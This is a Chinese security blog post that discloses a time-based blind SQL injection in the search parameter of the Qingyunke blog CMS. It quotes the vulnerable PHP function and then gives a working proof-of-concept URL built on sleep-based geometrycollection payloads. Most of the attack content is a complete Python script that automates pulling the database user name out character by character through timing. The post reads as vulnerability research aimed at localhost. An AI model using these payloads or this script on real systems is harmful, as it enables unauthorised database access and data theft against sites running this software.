青云客博客cms某处盲注
没穿底裤发表于 2016-04-15 05:40:45
作者:unhonker
延时注入,写代码受网速影响比较严重,网速不稳的话,可能误差比较大,当然,你可以适当把sleep数字搞大些,freebuf上面有一个转换成二进制,然后再开8个线程跑数据的思路,这里我就不写了。
在include/class_temp.php中
function articlelist($mark='',$ispage=true,$pagebtn=2,$auto=true,$bcat=0,$scat='',$lcat='',$size=0,$star=0,$word='',$order='',$searfie='title'){
global $web,$tcz;
if($mark=='special'){
if(!$size)$size=$web['list_size'];
$sql='select * from '.tabname('special_list').' where webid='.$web['id'].' and isdel=0 and special_id='.$tcz['id'].' order by dataid desc';
$spelist=db_getpage($sql,$size,$tcz['page'],'',goif($web['mobiletemp'],'mobile'),$pagebtn);
$list=array();
$web['list_record']=$spelist['num'];
$web['list_page']=$spelist['page'];
foreach($spelist['list'] as $spe){
$tname='article';
if($spe['modtype']>10)$tname.='_'.$web['id'].'_'.$spe['modtype'];
$art=db_getshow($tname,'*','webid='.$web['id'].' and isok=0 and dataid='.$spe['dataid']);
array_push($list,$art);
}
return $list;
}
$order_text='xu desc,sort desc,time_add desc,dataid desc';
if($order!='')$order_text=$order;
$tname='article';
$modtype=db_getone('module','modtype','webid='.$web['id'].goif($bcat,' and classid='.$bcat).goif($mark!='',' and mark="'.$mark.'"'));
if($modtype>10)$tname.='_'.$web['id'].'_'.$modtype;
$searsql='';
$seartype='title';
if($web['list_page']!='')$ispage=false;
if($ispage){
if($word=='')$word=$tcz['word'];
if($word!=''){
switch($tcz['seartype']){
case 'date':
$t1=strtotime($word.' 00:00:00');
$t2=strtotime($word.' 23:59:59');
if(empty($t1)){
tipmsg('非法的搜索关键词:'.$word,true);
}
$searsql=' and time_add>='.$t1.' and time_add<='.$t2;
break;
default:
if($tcz['seartype']!=''){
if(strstr(','.$searfie.',',','.$tcz['seartype'].','))$seartype=$tcz['seartype'];
}
if(strstr($word,',')){
$wlist=explode(',',$word);
foreach($wlist as $w)$searsql.=goif($searsql!='',' or ').'LOCATE("'.$w.'",`'.$seartype.'`)>0';
$searsql=' and ('.$searsql.')';
}else $searsql=' and LOCATE("'.$word.'",`'.$seartype.'`)>0';
break;
}
}
if(!$size)$size=$web['list_size'];
if(!$bcat&&$tcz['bcat']&&$mark==''&&$auto)$bcat=$tcz['bcat'];
if($scat==''&&$tcz['scat']&&$auto)$scat=$tcz['scat'];
if($lcat==''&&$tcz['lcat']&&$auto)$lcat=$tcz['lcat'];
$sql='select *,if(time_top>'.time().',1,0) as xu from '.tabname($tname).' where webid='.$web['id'].' and isok=0 and '.goif($web['mobiletemp'],'mobile','computer').'=0 and languages="'.$web['templang'].'"'.goif($star,goif($star==9,' and star>0',' and star='.$star)).goif($mark!='',' and mark="'.$mark.'"').goif($bcat,' and bcat='.$bcat).goif($scat!='',' and scat in('.$scat.')').goif($lcat!='',' and lcat in('.$lcat.')').goif($searsql!='',$searsql).' order by '.$order_text;
$list=db_getpage($sql,$size,$tcz['page'],'',goif($web['mobiletemp'],'mobile'),$pagebtn);
$web['list_record']=$list['num'];
$web['list_page']=$list['page'];
return $list['list'];
}else{
$sql='select *,if(time_top>'.time().',1,0) as xu from '.tabname($tname).' where webid='.$web['id'].' and isok=0 and '.goif($web['mobiletemp'],'mobile','computer').'=0 and languages="'.$web['templang'].'"'.goif($star,goif($star==9,' and star>0',' and star='.$star)).goif($mark!='',' and mark="'.$mark.'"').goif($bcat,' and bcat='.$bcat).goif($scat!='',' and scat in('.$scat.')').goif($lcat!='',' and lcat in('.$lcat.')').goif($word!='',' and LOCATE("'.$word.'",`'.$seartype.'`)>0').' order by '.$order_text;
$list=db_getlist($sql,$size);
return $list;
}
}其中变量$word过滤不得当,导致可以注入,测试了好多语句,最后别人给出的payload是延时注入,发现可以
漏洞验证:
http://127.0.0.1/?log=blog&seartype=title&word=%E9%9C%87%E6%92%BC%22%20and%20geometrycollection((select%20*from(select%20*%20from%20(select%20sleep%20(5))a)b))%20and%20%221%22=%221
效果页面延时5秒
写了个脚本:
#/usr/bin/python
#*-*coding=utf-8*-*
import requests
import time
session = requests.Session()
payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789#$%^&*()-+=!@_.'
def httpGet(url):
global session
try:
#print url
timestart = time.time()
session.get(url)
times = time.time() - timestart
#print times
except Exception ,e:
return 'timeout'
return times
def getLength(url):#获取长度
i = 0
temp = url
while True:
urls = temp
urls = urls + '" and geometrycollection((select *from(select * from (select sleep (case when (select length(user())='+str(i)+') then 5 else 0.1 end))a)b)) and "1"="1'
htmlContent = httpGet(urls)
print 'i-->' + str(i)
if htmlContent > 5:
print '长度为' + str(i)
return i
break
i += 1
def getUser(url,length):
data = ''
temp = url
for i in range(1,length):
for payload in payloads:
urls = temp + '" and geometrycollection((select *from(select * from (select sleep ( ascii(mid(user()from( '+str(i)+' )for(1)))='+str(ord(payload))+' ))a)b)) and "1"="1'
#print urls
htmlContent = httpGet(urls)
print "猜解中......."
if htmlContent > 3:
print payload
data += payload
break
return data
if __name__ == '__main__':
length = getLength('http://127.0.0.1/?log=blog&seartype=title&word=qq')
getUser('http://127.0.0.1/?log=blog&seartype=title&word=qq',length)
![140733xw3womc2o9zhiljz[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/04/140733xw3womc2o9zhiljz1.jpg)
![141027i8l666858w66gzz5[1]](http://7u2hr4.com1.z0.glb.clouddn.com/wp-content/uploads/2016/04/141027i8l666858w66gzz51.jpg)